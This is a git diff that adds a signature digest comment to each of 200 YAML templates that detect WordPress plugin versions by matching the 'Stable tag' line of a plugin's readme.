http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 200 files changed, 200 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..4c054eeeec 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201e86bedeb450b6c00402b784bb69954bb107eb89032bdf86aa6bee1f85642080022071b4c446da51fbfa93a2b433bb4dbcf7290de65173eac90931b2de6faf81792a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..bc836adc76 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200d41463d5a4c0c0478e6853d6486a7ca97f3faa0440db29df441c27c9e4027e1022100dcfee9129d877a444178ce6be652063a715e49dfe70e78b6904095b94405fae6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..499e8348fb 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022027d8c81efe632e7e622301018d98e84da94e0ea278f65a26144f432d7967ee6002200c52fb3f5d254a57021eea74035e86cfbf67cffc98e50cd9395dcbf2f015e8bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..7cb1de6839 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fa14a16588281e0bf487287326a6e7ae64b7c3e25e8519177edd0e228a2909cd02210096318df93ec532991a3e253c5b46c2cdfc8d62367cd907ff8612bf329affcc8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..e00f4808c2 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c3a68a462ffe3aa36521723146e294e8975619ccf559a015be0d83f4300a3fcf02201e86546bb3f11183528d694845d69e23172428561706399cb2153dc550cb8ac4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..9552bd08d6 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d872c24fb5b3a292e80395e2c1e9a434ec22017644d048e8ff195e5401277d2402204a1802db03c5c7f6355d41fcd05601e5e232ab4789ed2edd3435f6ffef72ba3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..28e6014423 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207525aabc59a84fa412dad31b2b9a2364ccc379f0db1f8fb49dd1dfd083db37d9022100c4dff16a45554d8df7790144b41515775aae4f453b988a752249208b75e8c240:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..545e43cbbf 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b475824448f097ee11326913636af0f73d28deef58a68095782dec742605019502200b6f2c7af4af46acf2ec08c4f8bcc973d242628fe9590156f0f998fd69434590:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..549d3cbdf7 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220587c2b3db25c6093757834f80c443fbd4814933f42a6b103c7d0ef054f84a75c0221009a3b08df0be2ebfc3140bd09e6311587570302ae269cf33fbf0a7c072e44708a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..ce7b81d21f 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206ac869332e400fc71b44d0f0acef1826b0896b1cc144332544f91af09cba2abe02203dacd136bb8e72d2ed87880e25673c9f3aa472fe984780ef772b6e14c934cdc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..7583a0a48e 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220618f81106e9455d93bc66194334dbc98e2cf9ca4dfae037e38762614ab7aac45022100f99e761b9dd6de15a59feadca62407d5f88f35d142f9baf3c45d5bd713455b26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..f021db01ac 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100de7684cddf2ff3d74d74d75bb9e29dc14b7455291a0c3db96435e4b46cd1856702201a0f0e02522df64841fea43d3fefd83f7d28a02d5695eb8cc6ce2fd46ec4be7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..e6b2de6fc6 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022071cedbd0fce7954a910fe6ef0b61923bce6c0510d1b3b1649bd4ad0bcb84f44902207f702c35c009c4076fce4efd60a8ec2ba0e8b3c380756bb563fc463ad3a317c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..c3090800b9 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ceca3d50c2ece138da3d886766aaf2bcfaa4b346a3e43f02459eeb8432f31b8d022100ba5f7a18252530c4b93eed380b720eee801618d6aa81b6febea62936eb94730e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..fc9929c13e 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c1ee4179ac63dcd0a82d0f93e32ad7d666482ad2b3bf502547292fd9fe5242d9022100c555ff21d68bd3bb4c765aec59c109b238bc4c5097d59391410a48e17fceba14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..f3ef99ecef 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201db4386981d82774d640785177f9b1114112daa801aae15e723b6663443fed9c02204e295d792c195477aceb99e4e1b1876b5d1ea6bde1c07f93ba7ae6ce2bbeeb85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..d6ba9d2131 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220549df555dd9b8d2869da45b29758a1d683d36a4517db2d96d3b7c6dab2945ae30220658402cf750df9c38411b60af836fd000107992614a610750b0cc560919f16df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..4f50db89d7 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200b5f1c9b9605cfd33422b1868bebc38b36274574b3e6547be3426a46095216ee022100b0fddf16f561e5a43331c0f46b9dca5f2b4a145447be0358591b0d4af8599cef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..17444dd0a3 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d185987564ae952105685104b57a6d5f8bc812664e6f8c04511d53e78d450d0f02200cc80ad935abcbf0446a3064ccfe7c36861993fbc11400ba4f803c241da18fb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..9a68087d18 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022055b0b4ba0682827ddc0e102002c00fd1344b4964f41c5ff7b375c7e59afa4bad022100d151e6ddcd00b2feda7f2cab0416e544b9ccf2d680fc17196b01451290160984:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..43c845243d 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206bb4e486d24688ffc3e485accf253f438eee3924b53478f871382b6a2fd697bf02205036cf64a015f6b33308ee5f24cfb171fafe38fa6954ae36eb1ba9a3515518ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..f71d052636 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009ffc816050bc85fa32757d0d626b7b14a81590f5eb556a6d750058badc1a111f0220048b013e6662c9c0253d45e7efd0e5d594901f9519456ee5663c0312dcb343c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..91791545dc 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022067b1d8659d2867d81252048118fa9d3c86c44a82d9440bab9dc3f04ae2ab7164022006738ba2bd5c98ad917f4eec9c24d020eb88afdc90d6448128f753d1d68b093b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..3b8729cfdc 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b81674d9e5b9208a84c3ed11ac4238cb6ec9e68f35b0edff29e19aa29bf09cf8022100c2c4bf2cefcfa0aa1016cfef4f34cab9bb97ec18a6c80b33176019a6399fae9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..30deff30d9 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220392b55cfa6ee518976f50485e430b88b80384a72677656b5005ba712c44cf272022054ce218a8d57f97981ebe1ed215ec4eee7fc09cd4a4c548f7c5e18d59f4e12ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..792fdea5d2 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009c57caaa99c6bcfd41d26cb92c9e425b385401a251b203d8f32391d875cb32a1022100b6ee67b7daf5cf44465b22add78b22e721d20eb10baaf5d972e5f9069941b273:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..6732e5432d 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201517110ea05719397845c7ce6e1e98bb3f8341f76856f6e9097990ea6abf6651022100d2e1fe38a12d90f193fbbcdb1ed230f61233732f1487662ec1ff61440b25cd8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..b4e56261db 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205ca9144917d0d1daf79f55c5022b9349472a491ddf4f763cb999238a5dbcc4c6022100a38b0d9601899a482733dd23b4e558b665f55306a1e7f82205ed219a4c55325d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..da0fd36d68 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e7540862122060819ca14df738ace969f2850d8f4a42829497dd1cfa25c1f869022049b37dece963ef7e48624c50185e2a36e0356755af88b8ac982e7f7a11326daf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..275adb1df5 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201bbe01efb39e7ad193b346472b94c82c01fce74ca2c34a5925f0e7312ab18fb80221009e4b02e3843ac325e79bccd4dac34cde556378436999f68ca2f0d9f00f2a072e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..7f28b84c32 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022028f649080a9517dc636202491236770e6b1ae79b3de94d87b43e0cb46a30d253022045224b2074d4a59179b32467a40569d9ea2d8af0d445af25933f8474609318c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..de6496bc3b 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009824cbf2e620f5529522d82d4ce96cf876e50a36a20a071c9c3de1429e4e719802203f3e4c7b95dfd38176d015d6952287419bce57e9c0e45bc2127e4a776e411325:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..538c0b58c2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203274fb12051d1ced5bc0640ae0e04cec2b0337a870373c706caacc9683fbd4f8022100f2142f5ad21deb9f575d108e67bfaaa2a949a55689f8de350b6b189c3974a17b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..92f7404db4 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bc629b92579698ff75627ff18225bcac1cd9a1d686a87ed6873f8353c75ea70a022100ce7a98d39a5c7e42dc9d00daa73c76533c44865de933cc0923f593e73e51f77d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..4c2ce5afc8 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f22e51d35b67b9ef9655b4b7ae644ae738f092fe5c9c9e0accac8a815d845d500220361732a425ba8a1c325447616c8057dabf84600aa7892d1ee0f753c7764f74e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..0c67f7fb23 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ee0ff5f77455e35e57952d74914e9c9b4e06089c3a6a365ccacc4aee144c94620221009f9e1d938e5e75bb5a2bb12174863cae1b2693227244ee9a0c83725dd6c238d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..0664eb72de 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200ecedecfd9bc4528c0356638e9f1154de677c456b282e9d4ccee14e728453f44022100e126859e9a2639d7ac7b0caa85d36f8ea5d9ba3bb88008b5656370f17e97a02f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 